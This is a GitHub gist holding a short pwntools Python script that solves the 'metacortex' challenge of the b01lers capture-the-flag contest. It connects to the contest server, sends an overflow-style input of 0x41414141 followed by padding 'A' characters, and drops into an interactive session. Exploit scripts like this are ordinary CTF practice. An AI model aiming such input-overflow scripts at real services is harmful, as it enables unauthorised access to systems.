Skip to content

Instantly share code, notes, and snippets.

@hkraw
Created October 4, 2020 13:53
Show Gist options
  • Save hkraw/e76561c1aae23e7cf3eb5353e0aa6dcb to your computer and use it in GitHub Desktop.
Save hkraw/e76561c1aae23e7cf3eb5353e0aa6dcb to your computer and use it in GitHub Desktop.
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
import random
if __name__ =='__main__':
# io = process('./metacortex-72ec7dee20d0b191fe14dc2480bd3f43')
io = remote('chal.ctf.b01lers.com',1014)
# pause()
io.sendlineafter('Work for the respectable software company, Neo.\n',str(0x41414141)+'A'*0x5a)
io.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment